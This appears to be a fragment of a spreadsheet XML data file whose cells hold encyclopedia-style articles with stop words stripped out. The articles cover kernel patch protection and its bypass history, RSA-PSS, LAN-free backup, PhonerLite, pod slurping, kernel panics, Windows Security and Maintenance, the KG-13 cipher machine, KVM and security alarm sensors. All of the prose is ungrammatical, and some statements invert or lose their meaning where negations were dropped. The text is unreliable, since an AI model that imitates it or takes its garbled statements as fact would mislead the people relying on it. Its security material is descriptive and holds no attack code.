because patching replaces kernel code unknown, untested code, assess quality impact third-party code...an examination online crash analysis (oca) data microsoft shows system crashes commonly result malicious non-malicious software patches kernel. criticisms third-party applications some computer security software, mcafee's mcafee virusscan symantec's norton antivirus, worked patching kernel systems. anti-virus software authored kaspersky known make extensive kernel code patching editions windows. this kind antivirus software work computers running editions windows kernel patch protection. because this, mcafee called microsoft either remove windows entirely make exceptions software made "trusted companies" themselves.symantec's corporate antivirus software norton 2010 range beyond worked editions windows despite kpp's restrictions, although less ability provide protection zero-day malware. antivirus software made competitors eset, trend micro, grisoft avg, avast!, avira anti-vir sophos patch kernel default configurations, patch kernel features "advanced process protection" "prevent unauthorized termination processes" enabled. microsoft weaken kernel patch protection making exceptions though microsoft known relax restrictions time time, benefit hypervisor virtualization software. instead, microsoft worked third-party companies create application programming interfaces help security software perform needed tasks without patching kernel. these interfaces included windows vista service pack weaknesses because design windows kernel, kernel patch protection cannot completely prevent kernel patching. this computer security providers mcafee symantec since imperfect defense, problems caused security providers outweigh benefits, malicious software simply find ways around kpp's defenses third-party security software less freedom action defend system.in january 2006, security researchers known pseudonyms "skape" "skywing" published report describes methods, theoretical, kernel patch protection might bypassed. skywing went publish second report january 2007 bypassing version third report september 2007 version also, october 2006 security company authentium developed working method bypass kpp.nevertheless, microsoft stated committed remove flaws allow bypassed part standard security response center process. keeping statement, microsoft released major updates kpp, designed break known bypass techniques previous versions. antitrust behavior 2006, european commission expressed concern kernel patch protection, saying anticompetitive. however, microsoft's antivirus product, windows live onecare, special exception kpp. instead, windows live onecare used (and always used) methods patching kernel provide virus protection services. still, reasons edition windows live onecare available november 2007. references external links truth about patchguard: symantec keeps complaining introduction kernel patch protection microsoft executive clarifies recent market confusion windows vista security kernel patch protection: frequently asked questions windows vista security patchguard archived 2008-12-09 wayback machineuninformed.org articles: bypassing patchguard windows subverting patchguard version patchguard reloaded: brief analysis patchguard version 3working bypass approaches destroyer (including source code) 2015 working driver bypass patchguard (including source code) 2008 bypassing patchguard editor 2009microsoft security advisories: june 2006 update kernel patch protection august 2007 update kernel patch protection</t>
  </si>
  <si>
    <t>Probabilistic signature scheme</t>
  </si>
  <si>
    <t>probabilistic signature scheme (pss) cryptographic signature scheme designed mihir bellare phillip rogaway.rsa-pss adaptation work standardized part pkcs#1 v2.1. general, rsa-pss used replacement rsa-pkcs#1 v1.5. design specifically developed allow modern methods security analysis prove security directly relates problem. there proof traditional pkcs#1 v1.5 scheme. implementations openssl wolfssl gnutls references external links raising standard signatures: rsa-pss 4056: rsassa-pss signature algorithm cryptographic message syntax (cms) 5756: updates rsaes-oaep rsassa-pss algorithm parameters 8017: pkcs cryptography specifications version</t>
  </si>
  <si>
    <t>LAN-free backup</t>
  </si>
  <si>
    <t>lan-free backup backup server data shared, central storage device without sending data local area network (lan). usually achieved using storage area network (san). note trivial backup dedicated, unshared storage device (such local tape drive) meet definition. technical aspects goal lan-free backup reduce load reduce time takes complete backup. offers alternative backup simple data copy network-attached storage (nas) comes different flavours: backup server: addition shared storage device (usually traditional tape library), exists central server arbitrating access device (for servers). central server however, handle data stream itself. without backup server: storage facility (usually virtual tape library, vtl) smart enough handle multiple data accesses without intermediate component. also data backup storage area network network-attached storage fiber channel technology external links description lan-free client data transfer operation tivoli storage manager: lan/wan backup; serverfree backup; lanfree backup; split-mirror backup what does mean?</t>
  </si>
  <si>
    <t>PhonerLite</t>
  </si>
  <si>
    <t>phoner phonerlite softphone applications windows operating systems available freeware. phoner multiprotocol telephony application supporting telephony capi, tapi voip, phonerlite provides specialized optimized user interface voip only. beside different user interface focus programs share code base. both programs session initiation protocol voip call signalisation. calls supported server-based infrastructure direct media streams transmitted real-time transport protocol encrypted secure real-time transport protocol (srtp) zrtp security protocols. phoner provides well interface configuring using supplementary isdn services provided capi thus needs isdn terminal adapter hardware installed computer. both programs support ipv4 ipv6 connections using udp, tls. supported audio formats g.711 a-law: kbit/s payload, sampling rate g.711 μ-law: kbit/s payload, sampling rate g.722: kbit/s payload, sampling rate g.726: kbit/s payload, sampling rate gsm: kbit/s payload, sampling rate ilbc: 13.3 15.2 kbit/s payload, sampling rate speex narrow band: kbit/s payload, sampling rate speex wide band: kbit/s payload, sampling rate opus: 10-50 kbit/s, sampling rate g.729: kbit/s payload, sampling rate linear pcm: kbit/s payload, 44.1 sampling rate also comparison voip software list software opportunistic encryption references external links phoner main website</t>
  </si>
  <si>
    <t>Pod slurping</t>
  </si>
  <si>
    <t>slurping using portable data storage device ipod digital audio player illicitly download large quantities confidential data directly plugging computer data held, inside firewall. there work development fixes problem, including number third-party security products allow companies security policies related device use, features within operating systems allow administrators users disable port altogether. unix-based unix-like systems easily prevent users mounting storage devices, microsoft released instructions preventing users installing mass storage devices operating systems.additional measures include physical obstruction ports, measures ranging simple filling ports epoxy resin commercial solutions deposit lockable plug port. also data theft bluesnarfing sneakernet references external links following external links indirect mechanism learning topic (e.g., detailed descriptions, examples, implementations). simple podslurping script podslurping bluesnarfing latest threats summary podslurping podslurping related risks slurping easy technique stealing data (pdf file) slurping podslurping early description slurping activity slurping example presentation</t>
  </si>
  <si>
    <t>Kernel panic</t>
  </si>
  <si>
    <t>kernel panic (sometimes abbreviated safety measure taken operating system's kernel upon detecting internal fatal error either unable safely recover continuing system would higher risk major data loss. term largely specific unix unix-like systems. equivalent microsoft windows operating systems stop error, often called "blue screen death". kernel routines handle panics, known panic() at&amp;t-derived unix source code, generally designed output error message console, dump image kernel memory disk post-mortem debugging, either wait system manually rebooted, initiate automatic reboot. information provided highly technical nature aims assist system administrator software developer diagnosing problem. kernel panics also caused errors originating outside kernel space. example, many unix operating systems panic init process, runs user space, terminates. history unix kernel maintains internal consistency runtime correctness assertions fault detection mechanism. basic assumption hardware software perform correctly failure assertion results panic, i.e. voluntary halt system activity. kernel panic introduced early version unix demonstrated major difference design philosophies unix predecessor multics. multics developer vleck recalls discussion change unix developer dennis ritchie: remarked dennis easily half code writing multics error recovery code. said, left stuff out. there's error, routine called panic, called, machine crashes, holler hall, 'hey, reboot it.'" original panic() function essentially unchanged fifth edition unix vax-based unix output error message information, dropped system endless idle loop. source code panic() function unix: unix codebase enhanced, panic() function also enhanced dump various forms debugging information console. causes panic occur result hardware failure software operating system. many cases, operating system capable continued operation error occurred. however, system unstable state rather risking security breaches data corruption, operating system stops prevent damage facilitate diagnosis error and, usual cases, restart.after recompiling kernel binary image source code, kernel panic booting resulting kernel common problem kernel correctly configured, compiled installed. add-on hardware malfunctioning could also sources fatal kernel errors start incompatibility missing device driver. kernel also panic() unable locate root file system. during final stages kernel userspace initialization, panic typically triggered spawning init fails. panic might also triggered init process terminates, system would unusable.the following implementation linux kernel final initialization kernel_init(): operating system specifics linux kernel panics appear linux like unix-like systems, also generate another kind error condition, known kernel oops. case, kernel normally continues killing offending process. oops could cause subsystems resources become unavailable, later lead full kernel panic. linux, kernel panic causes keyboard leds blink visual indication critical condition. macos when kernel panic occurs 10.2 10.7, computer displays multilingual message informing user need reboot system. prior 10.2, traditional unix-style panic message displayed; 10.8 later, computer automatically reboots displays message restart. format message varies version version: 10.0–10.1: system displays text screen, giving details error, becomes unresponsive. 10.2: rolls black transparent curtain displays message white background informing user restart computer. message shown english, french, german japanese. 10.3–10.5: kernel panic almost version 10.2 background error screen black. 10.6–10.7: text revised includes spanish translation. 10.8 later: computer becomes unresponsive immediately reboots. when computer starts back shows warning message seconds computer restarting kernel panic, computer restarts back message includes chinese translation.sometimes five kernel panics within three minutes first one, display prohibitory sign seconds, shut down; known "recurring kernel panic". versions 10.2, text superimposed standby symbol full screen. debugging information saved nvram written file reboot. 10.7 feature automatically restart kernel panic. cases, 10.2 later, white text detailing error appear addition standby symbol. also core dump blue screen death screen death references</t>
  </si>
  <si>
    <t>Security and Maintenance</t>
  </si>
  <si>
    <t>security maintenance (formerly known action center, security center earlier versions) component windows family operating systems monitors security maintenance status computer. monitoring criteria includes optimal operation antivirus software, personal firewall, well working status backup restore, network access protection (nap), user account control (uac), windows error reporting (wer), windows update. notifies user problem monitored criteria, antivirus program up-to-date offline. operation security maintenance consists three major components: control panel applet, windows service application programming interface (api) provided windows management instrumentation (wmi). control panel applet divides monitored criteria categories color-codes them. yellow indicates non-critical warning, e.g. settings monitored optimal. indicates critical message, e.g. anti-virus program offline. service, named "security center", determines current state settings. service, default, starts computer starts; continually monitors system changes, notifies user detects problem. versions windows prior windows adds notification icon windows taskbar. provider makes settings available system. third-party anti-virus, anti-spyware personal firewall software vendors primarily register security maintenance provider. windows vista added apis programs retrieve aggregate health status within security maintenance, receive notifications health status changes. these apis allow programs confirm system healthy state engaging certain actions. example, computer game ensure firewall running connecting online game. security maintenance charge following: querying status personal firewall turning querying status anti-malware program, turning instructing update querying status internet security settings asking user change optimal querying status user account control settings asking user change optimal scheduling executing automatic maintenance tasks, includes quick scan malware, disk defragmentation, power efficiency diagnostics querying status backup restore prompting user schedule backup place (windows only) querying status file history; however, user alerted (windows later only) querying status homegroup; alerts issued managing problems logged windows error reporting: user details, send microsoft automatically sent, query solution (although times, none) selectively delete them. version history windows microsoft learned discussions customers confusion whether users taking appropriate steps protect systems, steps taking effective. from research, microsoft made decision include visible control panel windows service pack would provide consolidated view important security features. service pack released august 2004, includes first version windows security center (wsc). this version monitors windows update, windows firewall, availability anti-virus program. third-party providers personal firewall anti-virus software packages encouraged register products wsc. august 2004, magazine published article security watch newsletter titled "windows security center spoofing threat" outlined design vulnerability could allow malware manipulate security center displaying false security status regardless true security status. malware requires administrative privileges. microsoft countered claim asserting piece malware gains administrative privileges, need spoof anything, commit much nastier malicious actions. windows vista windows vista monitors criteria, anti-spyware software, user account control, internet explorer security settings. also display logos third-party products registered security center. unlike windows beta versions windows vista, could disabled overridden. security software maker symantec spoke this, noting would cause great deal consumer confusion security problems would reported symantec's tools time. mcafee, another large security software vendor, lodged similar complaints. end, microsoft allowed disabled. windows windows windows security center renamed action center. designed centralize reduce number notifications system; such, encompasses security maintenance computer. notification icon windows taskbar appears message perusal replaces five separate notification icons found windows vista. "troubleshooting" link also added, providing shortcut windows troubleshooting control panel. windows windows action center monitors items: microsoft account, windows activation, smartscreen, automatic maintenance, drive status, device software, startup apps, homegroup, file history, storage spaces. windows windows name "action center" used application notifications quick actions. action center windows renamed security maintenance, causing confusion users administrators. longer displays icon notification area, otherwise retains features windows action center. "troubleshooting" link removed windows fall creators update. starting windows creators update, microsoft introduced component called windows defender security center (wdsc) provides much functionality. this component universal windows platform also default front-end windows defender. relies service, called "windows defender security center service". comparison security maintenance, wdsc: monitors antivirus firewall software, device drivers, device security, storage capacity, account protection, parental control, smartscreen windows update distinct icon notification area fully control windows defender supports third-party antivirus firewall (version 1709 later)in windows version 1809, windows defender security center renamed windows security center. also list microsoft windows components microsoft defender microsoft security essentials references external links msdn: windows security center</t>
  </si>
  <si>
    <t>KG-13</t>
  </si>
  <si>
    <t>kg-13 first transistorized cryptographic machine developed early 60's. used newly developed 2n404 germanium transistor instead vacuum tubes. consisted kg-3 transmitter kg-12 receiver. transmitter used transistors receiver 300. transmitter switchable function receiver. kg-13 (pontus) kg-13 electronic generator, transmitter/receiver similar appearance kg-14. this solid state design dating mid-to-late 1960s, originally cost $13,000 copy. first crypto machines encrypt data facsimile. crypto technicians received weeks training machine. kg-13 composed kg-3 transmitter kg-12 receiver. kg-13 unit. drawer bears designation kgd-3/tsec. total weight around pounds. kg-13 controlled "key cards". these ibm-like punch cards determined starting point kg-13 encryption done "koken stages". cards changed daily time. when pueblo, kg-13 aboard, captured north koreans 1968, personnel time destroy result, working model kg-13 fell enemy hands. quickly designed modification koken stage board alter operation order enemy identical working model. card reader description select link inside card reader. ronald coppock, worked kg-13 indicates fitted card cutter also without. ethiopia, worked locations (stonehouse tract kg13's equipped kw26 style card cutters. machines stonehouse equipped tract radio research south east asia, kg13's card cutter style card readers. 13's equipped card cutters operated high priority circuits short cycles change material. some hour others hour cycles". kg-13 major difference latter years, equipped card reader insert board crib. internal description kg-13 employed "flyball" modules. these modules made discrete components logic element circuit groups nand gates, gates, gates, flip flops, monostables, multivibrators, etc. once tested, modules potted compound whose colour indicated function. coloured potting compound extremely hard attempt penetrate resulted damage internal circuitry. kg-13, following colours confirmed: pink, yellow, green, blue, red, orange black. purple brown modules probably used colours unconfirmed time. yellow modules single transistor emitter follower clock drivers. pink modules transistor shift register flip flops. each yellow module drove nine pink ones. transistor multivibrator module drove audio alarm thru amplifier. transistor monostables also used. nand modules built single transistor modules built transistors. failures usually occurred power supplies, buffers, synchronizers though problems quickly resolved. when new, high frequency failures cold solder joints. board kg-13 black module noise generator containing zener diode noise source. this classified module noise used randomize stream startup. circuitry inside module used koken chain shift registers create pseudo random stream. that problem restarting kg-13 card. noise source ensured chances duplicating start point negligible. cards transmitter third receiver. there transmitter generators. keystream mixed plain text produced ciphertext. generators generating keystream match output mismatch would cause crypto alarm shutdown output. generator failure would stop transmission prevent compromise. with single generator transmitter failure could produce trivial keystream (all one's, zero's alternations). receiver generator failure produced garble. kg-3 could used transmit receive since xmit/recv switch lower right hand portion lowest unit. 1964/65 time frame, crypto techs taught would take 50,000 years break kg-13 using state techniques available time. kg-13 also employed traffic flow security. steve gardner recalls "one operations sites monitored satellites used item called "shark" teletype kg-13. block message transceiver". kg-13's taken service around 1989-90. this last discrete component crypto machines built. shortly time, integrated circuits started appear crypto machine designs. illustrated article describing arrival museum appeared spring 2004 issue ncmf internal publication, "the link". 2010, kg-13 storage. references further reading boak, david (july 1973) [1966]. "multi-purpose equipment". history u.s. communications security; david boak lectures, vol. (pdf) (2015 declassification review ed.). george meade, u.s. national security agency. 53–56. retrieved 2017-04-23.</t>
  </si>
  <si>
    <t>Kernel-based Virtual Machine</t>
  </si>
  <si>
    <t>kernel-based virtual machine (kvm) virtualization module linux kernel allows kernel function hypervisor. merged mainline linux kernel version 2.6.20, released february 2007. requires processor hardware virtualization extensions, intel amd-v. also ported operating systems freebsd illumos form loadable kernel modules. originally designed processors since ported s/390, powerpc, ia-64, arm.kvm provides hardware-assisted virtualization wide variety guest operating systems including linux, bsd, solaris, windows, haiku, reactos, plan aros research operating system macos. addition, android 2.2, gnu/hurd (debian k16), minix 3.1.2a, solaris darwin 8.0.1, together operating systems newer versions listed, known work certain limitations.additionally, provides paravirtualization support linux, openbsd, freebsd, netbsd, plan windows guests using virtio api. this includes paravirtual ethernet card, disk controller, balloon driver, graphics interface using spice vmware drivers. history kivity began development mid-2006 qumranet, technology startup company acquired 2008.kvm surfaced october, 2006 merged linux kernel mainline kernel version 2.6.20, released february 2007.kvm maintained paolo bonzini. internals provides device abstraction processor emulation. exposes /dev/kvm interface, user mode host guest vm's address space. host must also supply firmware image (usually custom bios emulating pcs) guest bootstrap main feed guest simulated i/o. guest's video display back onto system host.originally forked version qemu provided launch guests deal hardware emulation handled kernel. that support eventually merged upstream project. there numerous virtual machine monitors (vmms) utilise interface including kvmtool, crosvm firecracker numerous specialised vmms build frameworks rust-vmm. internally, uses seabios open source implementation 16-bit bios. features support swappable vcpus, dynamic memory management, live migration since february 2007. memory write intensive workload impact migration process emulated hardware emulates little hardware, instead deferring higher level client application qemu, crosvm, firecracker device emulation. provides following emulated devices: virtual memory virtio graphical management tools kimchi web-based virtualization management tool virtual machine manager supports creating, editing, starting, stopping kvm-based virtual machines, well live cold drag-and-drop migration hosts. proxmox virtual environment open-source virtualization management package including lxc. bare-metal installer, web-based remote management gui, cluster stack, unified storage, flexible network, optional commercial support. openqrm management platform managing heterogeneous data center infrastructures gnome boxes gnome interface managing libvirt guests linux ovirt open-source virtualization management tool built libvirt licensing kernel-mode component part linux kernel, licensed general public license, version also references bibliography amit shah (2016-11-02). "ten years kvm". lwn.net. retrieved 2017-02-10. external links official website best practices kernel-based virtual machine, ibm, second edition, april 2012 virtio-blk performance improvement, forum 2012, november 2012, asias wikibook qemu crosvm chrome virtual machine monitor firecracker</t>
  </si>
  <si>
    <t>Security alarm</t>
  </si>
  <si>
    <t xml:space="preserve">security alarm system designed detect intrusion, unauthorized entry, building areas home school. security alarms used residential, commercial, industrial, military properties protect burglary (theft) property damage, well personal protection intruders. security alerts neighborhoods show connection diminished robbery. alarms likewise help protect vehicles contents. prisons also security systems control inmates. some alarm systems serve single purpose burglary protection; combination systems provide fire intrusion protection. intrusion-alarm systems combined closed-circuit television surveillance (cctv) systems record intruders' activities interface access control systems electrically locked doors. there many types security systems. homeowners typically small, self-contained noisemakers. these devices also complicated, multirole systems computer monitoring control. even include two-way voice allows communication panel monitoring station. design basic alarm consists least sensor detect trespassers alerting device indicate intrusion. however, typical premises security alarm employs following components: premises control unit (pcu), alarm control panel (acp), simply panel: "brain" system; reads sensor inputs, tracks arm/disarm status, signals intrusions. modern device, typically computer circuit boards inside metal enclosure. many newer networks often sealed plastic boxes open. some also control units built-in keypad human-machine interface. sensors: devices detect intrusions. sensors' locations perimeter protected area, within both. sensors detect intruders different methods. example, sensors monitor doors windows openings monitor unoccupied interiors motions, sound, vibration, disturbances alerting devices: these indicate alarm condition. most commonly, bells, sirens, also flashing lights. alerting devices serve dual purposes warning occupants intrusion potentially scaring burglars. these devices also warn occupants fire smoke condition keypads: small devices, typically wall-mounted, function human-machine interface system. addition buttons, keypads typically feature indicator lights, small multi-character display, both. interconnections components. interconnections consist direct wiring control unit wireless links local power supplies.in addition system itself, security alarms often offer monitoring service. event alarm, premises control unit contacts central monitoring station. operators station signal take appropriate action, contacting property owners, notifying police, dispatching private security forces. such alerts transmit dedicated alarm circuits, telephone lines, internet many cases. sensor types hermetically sealed reed switches hermetically sealed reed switch common type two-piece sensor. this switch operates electrically conductive reed switch either normally open normally closed influence magnetic field respect proximity second piece, contains magnet. when magnet moves away reed switch, reed switch either closes opens, based whether design usually open closed. this action coupled electric current (typically allows alarm control panel detect fault zone circuit. these sensors common, found wired directly alarm control panel, typically found wireless door window contacts sub-components. passive infrared detectors passive infrared (pir) motion detector common sensors found household small business environments. offers affordable reliable functionality. term passive refers fact detector generate radiate energy; works entirely detecting heat energy given objects. strictly speaking, sensors detect motion; instead, identify abrupt changes temperature given point. intruder walks front sensor, temperature point rise room temperature body temperature, back again. this quick change triggers detection. sensors designed wall- ceiling-mounted, come various fields view, narrow-point detectors 360-degree radar. pirs require power supply addition detection signaling circuit. infrasound detectors infrasound detector works detecting infrasound, sound waves frequencies hertz. sounds frequencies inaudible human ear. inherent properties, infrasound travel distances many hundreds kilometers. infrasound signals result volcanic eruptions, earthquakes, gravity waves, opening closing doors, forcing windows, name few. entire infrasound detection system consists following components: speaker (infrasound sensor) microphone input, order-frequency filter, analog digital (a/d) converter, finally, used analyze recorded signal. each time potential intruder tries enter house, tests whether closed locked, uses tools openings, or/and applies pressure, therefore creates low-frequency sound vibrations. before intruder breaks infrasound detector automatically catches sight intruder's actions purpose system detect burglars enter house avoid theft vandalism. sensitivity dependent size home presence animals. ultrasonic detectors these active detectors transmit ultrasonic sound waves inaudible humans using frequencies khz. doppler shift principle underlying method operation detects change frequency object motion. this detection occurs object must cause change ultrasonic frequency receiver relative transmitting frequency. ultrasonic detector operates transmitter emitting ultrasonic signal area protected. solid objects (such surrounding floor, walls, ceiling) reflect sound waves, receiver detect. because ultrasonic waves transmitted air, hard-surfaced objects tend reflect ultrasonic energy, soft surfaces tend absorb energy. when surfaces stationary, frequency waves detected receiver equal transmitted frequency. however, change frequency occur result doppler principle, person object moving towards away detector. such event initiates alarm signal. this technology active many properties many alarm professionals consider obsolete. microwave detectors this device emits microwaves transmitter detects reflected microwaves reduction beam intensity using receiver. transmitter receiver usually combined inside single housing (monostatic) indoor applications separate housings (bistatic) protection outdoor perimeters high-risk sites critical infrastructures fuel storage, petrochemical facilities, military sites, civil military airports, nuclear facilities more. reduce false alarms type detector usually combined passive infrared detector, dual brand similar alarm. compared monostatic, bistatic units work longer distances: typical distances transmitter-receivers x-band frequencies k-band frequencies. microwave detectors respond doppler shift frequency reflected energy, phase shift, sudden reduction level received energy. effects indicate motion intruder. advantages: cost, easy install, invisible perimeter barrier. affected fog, rain, snow, sand storms, wind. disadvantages: affected presence water dripping ground. typically need sterile clearance area prevent partial blocking detection field. functioning microwave generator equipped antenna allows concentrate beam electromagnetic waves preferred location beam intercepted receiver, equipped similar antenna transmitter. graphical representation beam similar cigar, and, disturbed, runs transmitter receiver generates continuous signal. when individual tries cross beam, produces disturbance caught receiver variation amplitude received signal. these barriers immune harsh weather, fog, heavy rain, snow sandstorms: none atmospheric phenomena affect behaviour reliability microwave detection. furthermore, working temperature range technology goes -35°c +70°c. digital analysis signal recent higher performance models detectors adopt digital technology "fuzzy logic"analysis signals. those generate detection whether intruder rolling, crossing, crawling moving slow within electromagnetic field. thanks innovative technology, capable targeting movements, outcome reduction false alarms. ellipsoidal shape longitudinal section however allow good detection capability close receiver transmitter heads, identify areas dead zones. solution avoid problem, installing barriers, cross respective transmitter receiver heads meters respective heads mono-head sensor cover mentioned dead zones. compact surveillance radar compact surveillance radar emits microwaves transmitter detects reflected microwaves. they similar microwave detectors detect precise location intruders areas extending hundreds acres. with capability measuring range, angle, velocity, direction, size target, pinpoint precise coordinate intruder. this target information typically displayed map, user interface situational awareness software defines geographical alert zones geofences different types actions initiated depending time factors. commonly used protect outside fence line critical facilities electrical substations, power plants, dams, bridges. photoelectric beams photoelectric beam systems detect presence intruder transmitting invisible infrared light beams across area, beams obstructed. improve detection surface area, beams often employed stacks more. however, intruder aware technology's presence, avoided. technology effective long-range detection system, installed stacks three transmitters receivers staggered create fence-like barrier. systems available internal external applications. prevent clandestine attack using secondary light source used hold detector sealed condition whilst intruder passes through, systems detect modulated light source. advantages: cost, easy install. require little sterile clearance area operate disadvantages: affected high luminosity. position transmitter located cameras. glass-break detection glass-break detector used internal perimeter building protection. glass-break acoustic detectors mounted close proximity glass panes listen sound frequencies associated glass breaking. seismic glass-break detectors, generally referred shock sensors, different installed glass pane. when glass breaks produces specific shock frequencies travel glass often window frame surrounding walls ceiling. typically, intense frequencies generated khz, depending type glass presence plastic interlayer. seismic glass-break detectors feel shock frequencies turn generate alarm condition. window foil less sophisticated, mostly outdated detection method involves gluing thin strip conducting foil inside glass putting low-power electric current breaking glass intents purposes ensured tear foil break circuit. smoke, heat, carbon monoxide detectors most systems also equipped smoke, heat, and/or carbon monoxide detectors. these also known 24-hour zones (which times). smoke heat detectors protect risk fire using different detection methods. carbon monoxide detectors help protect risk carbon monoxide poisoning. although intruder alarm panel also detectors connected, meet local fire code requirements fire alarm system. traditional smoke detectors technically ionization smoke detectors create electric current metal plates, sound alarm disrupted smoke entering chamber. ionization smoke alarms quickly detect small amounts smoke produced fast-flaming fires, cooking fires fueled paper flammable liquids. newer, perhaps safer, type photoelectric smoke detector. contains light source light-sensitive electric sensor, positioned 90-degree angle sensor. normally, light light source shoots straight across misses sensor. when smoke enters chamber, scatters light, hits sensor triggers alarm. photoelectric smoke detectors typically respond faster fire early, smoldering stage source fire bursts flames. motion sensors motion sensors devices various forms technology detect movement. technology typically found motion sensors trigger alarm includes infrared, ultrasonic, vibration contact. dual technology sensors combine forms detection order reduce false alarms method advantages disadvantages. traditionally motion sensors integral part home security system. these devices typically installed cover large area commonly cover 135° field vision. driveway alarms driveway alarm systems combined security automation systems. they designed alert residents unexpected visitors, intruders, deliveries arriving property. they come magnetic infrared motion sensing options. driveway alarms also purchased hard-wired wireless systems. they common rural security systems well commercial applications. electro-mechanical (shaker) sensors these electro-mechanical devices mounted barriers used primarily detect attack structure itself. technology relies unstable mechanical configuration forms part electrical circuit. when movement vibration occurs, unstable portion circuit moves breaks current flow, produces alarm. medium transmitting vibration must correctly selected specific sensor best suited different types structures configurations. this technology gradually replaced intelligent digital accelerometer-based systems. advantages: low-cost easily installed existing fences. disadvantages: must fence-mounted. being mechanical nature, system unable analyze differences pattern vibrations (for example, difference gusts wind person climbing fence). mems accelerometer mems technology, micro electro-mechanical system, electromagnetic device created using technologies used produce chips: technology called photolithography, incision ionian implantation. result compact small device dimensions thickness weight 0,040 grams. small device, addition mechanical system, electronic circuits control, acquisition conditioning signal able sense environment.mems accelerometer divided groups: piezoresistive capacitive based accelerometers. first group consist single degree freedom system mass suspended spring, also beam proof mass beam’s piezoresistive patch beam web.on contrary, capacitive based accelerometers, also known vibration sensors, rely change electrical capacitance response acceleration. operating principle current technology allows realize suspended silicon structures attached substrate points called anchors, constitute sensitive mass accelerometer mems. these structures free move direction acceleration detected, constitute mobile reinforcement pair capacitors connected half bridge. acquired signals amplified, filtered converted digital signals supervision specific control circuits. mems' incorporation’s evolved single, stand-alone device integrated 6-axis 9-axis inertial motion units available market today.this technology uses variety transduction mechanism detect displacement. they include capacitive, piezoresistive, thermal, optical, piezoelectric tunneling. applications last decades many technological progresses made area mems accelerometers used high-reliability environments starting replace established technologies. mems accelerometer applied sensor earthquake disaster prevention since main characteristics mems accelerometer linear frequency response 500hz capability offers improvement measuring ground motion lower frequency band.another practical application mems accelerometers machine condition monitoring reduce machines’ maintenance. wireless embedded technologies micro-electro mechanical system sensors offer wireless smart vibration measurement machine’s condition.moving defence field, applied fence-mounted intrusion detection systems. since mems sensors able work wide temperature range, prevent intrusions outdoors spread-off perimeters. properties advantage offered mems accelerometers ability measure static accelerations, acceleration gravity. this enables constantly verify positioning sensor, based mems accelerometer, remains unaltered installation one. mems accelerometers’ significant advantages also given small size high measurement frequency; additionally, integrated multiple sensors different functions. ferrous metal detectors change local magnetic field presence ferrous metals induces current buried sensors (buried cables discrete sensors) analyzed system. change exceeds predetermined threshold, alarm generated. this type sensor used detect intruders carrying substantial amounts metal, firearm, making ideally suited anti-poaching applications. electrostatic field sometimes referred e-field, volumetric sensor uses electric field proximity sensing installed buildings, perimeters, fences, walls. also ability installed free-standing dedicated poles. system uses electromagnetic field generator powering wire, another sensing wire running parallel sensing wire connected signal processor analyses: amplitude change (mass intruder), rate change (movement intruder), preset disturbance time (time intruder pattern).these items define characteristics intruder three detected simultaneously, alarm signal generated. barrier provide vertical protection ground height mounting posts (typically meters height), depending number sensor wires installed. usually configured zones metre lengths. advantage: high-security (difficult defeat), high vertical detection field. disadvantages: expensive, short zones mean electronics (and thus higher cost). microphonic systems microphonic systems vary design (for example, time-domain reflectrometer piezo-electric) generally based detection intruder attempting climb fence. usually microphonic detection systems installed sensor cables attached rigid chain-wire fences, however specialized versions systems also installed buried systems underground. depending version selected, sensitive different frequencies levels noise vibration. system based coaxial electro-magnetic sensor cable controller ability differentiate signals cable chain-wire cut, intruder climbing fence, weather conditions. systems designed detect analyze incoming electronic signals received sensor cable, generate alarms signals exceed pre-set conditions. systems adjustable electronics permit installers change sensitivity alarm detectors suit specific environmental conditions. tuning system usually accomplished commissioning detection devices. advantages: relatively inexpensive compared systems easy install. disadvantage: older systems high rate false alarms caused wind distances, although newer systems (digital signal processing) process signal greatly reduce false alarms cases. taut wire fence systems taut wire perimeter security system basically independent screen tensioned tripwires usually mounted fence wall. alternatively, screen made thick need supporting chain-wire fence. these systems designed detect physical attempt penetrate barrier. taut wire systems operate variety switches detectors sense movement tense wires. these switches detectors simple mechanical contact, static force transducer electronic strain gauge. unwanted alarms caused birds animals avoided adjusting sensors ignore objects exert small amounts pressure wires. this type system vulnerable intruders digging fence. concrete footing directly fence installed prevent type attack. advantages: rate false alarms, reliable sensors, high rate detection. disadvantages: expensive complicated install. fiber optic cable fiber-optic cable used detect intruders measuring difference amount light sent fiber core. variety fiber optic sensing technologies used, including rayleigh scattering interferometry, cable disturbed, light changed intrusion detected. cable attached directly chain-wire fence bonded barbed steel tape used protect tops walls fences. this type barbed tape provides good physical deterrent well giving immediate alarm tape severely distorted. advantages: being cable-based, similar microphonic system easy install. allow cover large perimeters (few tens km). disadvantage: typically performs manner similar microphonic-based systems higher cost complexity fiberoptic technology. ported coaxial cable this system employs electro-magnetic field disturbance principle based unshielded 'leaky') coaxial cables buried approximately ft.) deep ft.) apart. transmitter emits continuous radio frequency (rf) energy along cable energy received cable. when change field strength weakens presence object reaches pre-set lower threshold, alarm condition generated. system covert installation. care must taken ensure surrounding soil offers good drainage order avoid nuisance alarms. advantage: concealed buried form. disadvantages: affected noise, difficult install. security electric fence security electric fences consist wires carry pulses electric current provide non-lethal shock deter potential intruders. tampering fence also results alarm logged security electric fence energiser, also trigger siren, strobe, and/or notifications control room directly owner email phone. practical terms, security electric fences type sensor array acts part physical barrier, psychological deterrent potential intruders, part security alarm system. advantages: less expensive many methods, less likely give false alarms many alternative perimeter security methods, highest psychological deterrent methods. disadvantage: potential unintended shock. wired, wireless, hybrid systems trigger signal every sensor transmitted control units either wires wireless means (radio, line carrier, infrared). wired systems convenient sensors (such pirs, smoke detectors, etc.) require external power operate correctly; however, costly install. entry-level wired systems utilize star network topology, panel center logically, devices home line wires back panel. more complex panels network topology wire basically data loop around perimeter facility, drops sensor devices must include unique device identifier integrated sensor device (e.g. biscuit). wired systems also advantage, wired properly example dual loop, tamper-evident. wireless systems, hand, often battery-powered transmitters easier install less expensive start-up costs, fail batteries maintained. depending distance construction materials, wireless repeaters required bring signal alarm panel reliably. wireless system moved home easily, advantage rent move frequently. important wireless connection security control panel monitoring station. wireless monitoring alarm system protects burglar cutting cable failures internet provider. this full wireless setup commonly referred 100% wireless. hybrid systems wired wireless sensors achieve benefits both. transmitters also connected premises' electrical circuits transmit coded signals control unit (line carrier). control unit usually separate channel zone burglar fire sensors, better systems separate zone every different sensor, well internal trouble indicators (mains power loss, battery, broken wire, etc.). alarm connection monitoring depending upon application, alarm output local, remote combination. local alarms include monitoring, though include indoor and/or outdoor sounders (e.g. motorized bell electronic siren) lights (e.g. strobe light) useful signaling evacuation notice people fire alarms, hopes scare amateur burglar quickly. however, widespread alarm systems (especially cars), false alarms frequent many urbanites tend ignore alarms rather investigating, alone contacting 